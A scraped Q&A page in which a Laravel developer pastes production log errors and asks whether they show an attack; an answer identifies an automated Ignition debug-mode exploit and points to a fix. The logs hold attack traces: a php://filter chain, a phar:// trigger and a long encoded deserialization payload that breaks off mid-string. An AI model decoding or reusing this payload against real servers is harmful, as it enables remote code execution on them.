Logo Questions Linux Laravel Mysql Ubuntu Git Menu
HTML CSS JAVASCRIPT SQL PYTHON PHP BOOTSTRAP JAVA JQUERY R React Kotlin
 

file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar

Tags:

error-handling

laravel

phar

I have a Laravel 8.6.0 web application on local and a production server, both are exactly the same versions of php and apache. But I'm getting an error only in my production server implementation.

All my laravel logs are filled with the following errors. As you can see, these errors occur in the same time window (2:48am) and then an hour and some minutes later (4:15am) the same errors are logged again.

[2021-03-07 02:48:53] local.ERROR: file_put_contents(php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log): failed to open stream: operation failed {"exception":"[object] (ErrorException(code: 0): file_put_contents(php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log): failed to open stream: operation failed at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:69)

[2021-03-07 02:48:57] local.ERROR: file_get_contents(aa): failed to open stream: No such file or directory {"exception":"[object] (ErrorException(code: 0): file_get_contents(aa): failed to open stream: No such file or directory at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)

[2021-03-07 02:49:27] local.ERROR: file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar "/var/www/copa/storage/logs/laravel.log" (__HALT_COMPILER(); not found) {"exception":"[object] (ErrorException(code: 0): file_get_contents(phar://../storage/logs/laravel.log/test.txt): failed to open stream: internal corruption of phar "/var/www/copa/storage/logs/laravel.log" (__HALT_COMPILER(); not found) at /var/www/copa/vendor/facade/ignition/src/Solutions/MakeViewVariableOptionalSolution.php:75)

[2021-03-07 02:49:58] local.ERROR: file_get_contents(=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=75=00=43=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=58=00=43=00=51=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=34=00=4F=00=54=00=41=00=36=00=49=00=6D=00=56=00=6A=00=61=00=47=00=38=00=67=00=4D=00=47=00=4A=00=6B=00=4E=00=7A=00=6B=00=35=00=4D=00=47=00=45=00=67=00=4A=00=69=00=59=00=67=00=5A=00=57=00=4E=00=6F=00=62=00=79=00=42=00=4A=00=65=00=55=00=56=00=32=00=57=00=57=00=31=00=73=00=64=00=55=00=77=00=79=00=53=00=6D=00=68=00=6A=00=4D=00=6D=00=64=00=4C=00=59=00=30=00=64=00=30=00=63=00=47=00=4A=00=48=00=64=00=32=00=64=00=4D=00=56=00=31=00=6C=00=6E=00=5A=00=57=00=35=00=4F=00=4D=00=6C=00=6C=00=33=00=63=00=48=00=64=00=68=00=4D=00=6D=00=78=00=7A=00=59=00=6B=00=4E=00=42=00=64=00=46=00=70=00=70=00=51=00=6E=00=64=00=61=00=52=00=31=00=5A=00=74=00=57=00=6C=00=63=00=31=00=61=00=31=00=70=00=59=00=53=00=6D=00=74=00=44=00=62=00=6B=00=4A=00=79=00=59=00=56=00=64=00=34=00=63=00=30=00=6C=00=44=00=4D=00=57=00=31=00=4A=00=53=00=46=00=5A=00=33=00=57=00=6B=00=64=00=47=00=4D=00=46=00=70=00=58=00=54=00=6D=00=39=00=61=00=56=00=30=00=35=00=79=00=57=00=6C=00=68=00=4B=00=61=00=30=00=4E=00=6E=00=63=00=47=00=31=00=6B=00=56=00=7A=00=56=00=71=00=5A=00=45=00=64=00=73=00=64=00=6D=00=4A=00=70=00=51=00=6D=00=5A=00=59=00=4D=00=6B=00=34=00=78=00=59=00=32=00=31=00=33=00=62=00=30=00=74=00=54=00=51=00=6A=00=64=00=44=00=61=00=55=00=46=00=6E=00=59=00=32=00=31=00=57=00=61=00=46=00=70=00=44=00=51=00=6E=00=64=00=6A=00=62=00=54=00=6B=00=77=00=59=00=6E=00=6C=00=43=00=65=00=6C=00=70=00=59=00=53=00=6A=00=4A=00=61=00=57=00=45=00=6C=00=6E=00=59=00=30=00=64=00=47=00=4D=00=47=00=46=00=44=00=51=00=54=00=68=00=51=00=52=00=48=00=64=00=72=00=53=00=30=00=64=00=57=00=61=00=6D=00=46=00=48=00=4F=00=47=00=64=00=4B=00=53=00=48=00=4E=00=34=00=54=00=48=00=6B=00=34=00=64=00=6B=00=78=00=35=00=51=00=6A=00=6C=00=4C=00=55=00=57=00=39=00=6E=00=53=00=55=00=56=00=53=00=55=00=46=00=46=00=36=00=4D=00=48=00=5A=00=4B=00=53=00=48=00=52=00=33=00=57=00=56=00=68=00=53=00=62=00=30=00=78=00=35=00=4F=00=47=00=64=00=4D=00=65=00=54=00=6B=00=35=00=51=00=32=00=6C=00=42=00=5A=00=31=00=4E=00=46=00=4F=00=56=00=52=00=57=00=52=00=44=00=42=00=72=00=5A=00=54=00=4E=00=4F=00=62=00=47=00=4E=00=75=00=57=00=6D=00=78=00=6A=00=61=00=54=00=68=00=32=00=54=00=32=00=6C=00=77=00=4F=00=55=00=4E=00=70=00=51=00=57=00=64=00=56=00=52=00=54=00=6C=00=54=00=56=00=6B=00=51=00=77=00=61=00=32=00=55=00=7A=00=54=00=6D=00=78=00=6A=00=62=00=6C=00=70=00=73=00=59=00=32=00=6B=00=34=00=64=00=6B=00=74=00=71=00=63=00=44=00=6C=00=44=00=61=00=55=00=46=00=6E=00=56=00=7A=00=46=00=7A=00=5A=00=32=00=56=00=44=00=53=00=57=00=74=00=6C=00=4D=00=47=00=68=00=51=00=56=00=54=00=46=00=53=00=4F=00=55=00=6C=00=70=00=51=00=54=00=6C=00=51=00=55=00=30=00=49=00=30=00=53=00=57=00=6C=00=53=00=4E=00=31=00=56=00=46=00=4F=00=56=00=4E=00=57=00=53=00=44=00=42=00=70=00=53=00=55=00=59=00=78=00=5A=00=45=00=6C=00=44=00=57=00=57=00=31=00=4A=00=52=00=6B=00=4A=00=51=00=56=00=57=00=78=00=52=00=4F=00=55=00=39=00=45=00=51=00=55=00=74=00=44=00=61=00=55=00=46=00=6E=00=57=00=6C=00=68=00=6F=00=62=00=46=00=6C=00=35=00=51=00=58=00=70=00=51=00=52=00=44=00=52=00=32=00=57=00=6B=00=64=00=57=00=4D=00=6B=00=77=00=7A=00=55=00=6D=00=70=00=6A=00=51=00=7A=00=68=00=72=00=5A=00=54=00=42=00=6F=00=55=00=46=00=55=00=78=00=55=00=6A=00=6C=00=4D=00=65=00=56=00=4A=00=52=00=56=00=44=00=46=00=4B=00=56=00=55=00=4E=00=70=00=51=00=57=00=64=00=61=00=56=00=30=00=35=00=76=00=59=00=6E=00=6C=00=42=00=64=00=46=00=70=00=58=00=4E=00=47=00=64=00=4A=00=61=00=32=00=52=00=47=00=56=00=6B=00=4E=00=42=00=61=00=32=00=55=00=77=00=55=00=6C=00=42=00=52=00=4D=00=7A=00=42=00=6E=00=55=00=30=00=5A=00=53=00=56=00=56=00=56=00=44=00=4F=00=48=00=68=00=4D=00=61=00=6B=00=4A=00=6A=00=59=00=32=00=78=00=34=00=64=00=56=00=4E=00=48=00=4F=00=58=00=70=00=6B=00=52=00=47=00=39=00=6E=00=53=00=6B=00=68=00=30=00=53=00=56=00=51=00=78=00=54=00=6C=00=56=00=6D=00=56=00=6E=00=68=00=35=00=57=00=45=00=63=00=31=00=59=00=

In my .env file I have configured the log_channel to daily so it's strange to me that phar is requiring laravel.log/test.txt? Is this some kind of attack?

I've been developing laravel applications for 5 years now and this is the first time I'm getting these errors. I'm kinda worried because of the possibility of someone trying to hack this server.

Thanks in advance.

like image 682
chuysbz Avatar asked Mar 07 '21 14:03

chuysbz

1 Answers

It's probably automatic attack. Set your APP_DEBUG to false and check this issue https://github.com/facade/ignition/issues/350

And more information here https://www.ambionics.io/blog/laravel-debug-rce

like image 103
ce9oc Avatar answered Oct 21 '22 20:10

ce9oc
Sign in to Comment

Related questions

Laravel custom pagination on page 2 return as object
Laravel 5.5 - update or create bulk insert
Storage link is not included when doing a Git push Laravel
Laravel validation numeric with gte:1 throws exception
Retrieve fillable fields in Laravel
Laravel 5.8 syncing / attaching / detaching events
Convert object of objects to array of objects (PHP, Laravel)
Laravel Factories and Seeding: Static array of arrays
What is the use of laravel remember me token?
React: Preserve cookies when redirecting to sub-domain
Why the Laravel helpers are deprecated in version 5.8?
Laravel can't create policy for user model
vuetify table page is not working and reset back to 1
Integer or String for a phone number?
'The bootstrap/cache directory must be present and writable' error during laravel 6 testing
404 not found mailgun domain on laravel
How can I avoid reactivity in vue
How do I pass Array in $router.push in Vue.js?
Laravel: save image in database
Laravel Livewire Pagination

Donate For Us

If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!